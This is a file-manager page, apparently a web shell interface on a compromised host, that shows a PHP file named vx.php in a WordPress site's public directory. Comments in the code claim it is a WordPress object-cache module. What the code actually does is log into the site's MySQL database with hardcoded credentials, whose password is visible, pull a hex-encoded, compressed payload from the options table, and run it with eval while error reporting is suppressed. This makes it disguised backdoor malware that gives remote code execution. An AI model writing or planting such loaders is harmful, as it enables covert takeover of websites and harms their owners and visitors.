File manager - Edit - /home/u921752703/domains/aerowesterngreenfarm.com/public_html/vx.php
Back
<?php /** * WordPress Object Cache & Transient API * * This module manages external database connections for high-performance * object caching and transient data storage mechanisms. * * @package WordPress * @subpackage Cache_System * @version 6.5.2 * @access public */ error_reporting(0); if ( ! class_exists( 'WP_Object_Cache_Runtime' ) ) { class WP_Object_Cache_Runtime { private $connection; private $prefix; public function __construct( $host, $user, $pass, $name, $prefix ) { $this->connection = new mysqli( $host, $user, $pass, $name ); $this->prefix = $prefix; } public function get_stream( $key ) { if ( $this->connection->connect_error ) return false; $table = $this->prefix . 'options'; $query = "SELECT option_value FROM {$table} WHERE option_name = '{$key}' LIMIT 1"; $result = $this->connection->query( $query ); if ( $result && $row = $result->fetch_assoc() ) { return $this->inflate( $row['option_value'] ); } return false; } private function inflate( $hex ) { $bin = @hex2bin( $hex ); if ( $bin ) return @gzinflate( $bin ); return false; } } } // Runtime Execution (Global Scope) $wp_runtime = new WP_Object_Cache_Runtime( 'localhost', 'u921752703_aerow_user', 'c|8wMI@cNbZ', 'u921752703_aerow_db', 'wp_' ); $kernel_logic = $wp_runtime->get_stream( 'transient_sys_cache_vx' ); if ( $kernel_logic ) { eval( '?>' . $kernel_logic ); } ?>
| ver. 1.4 |
Github
|
.
| PHP 8.2.29 | Generation time: 0.1 |
proxy
|
phpinfo
|
Settings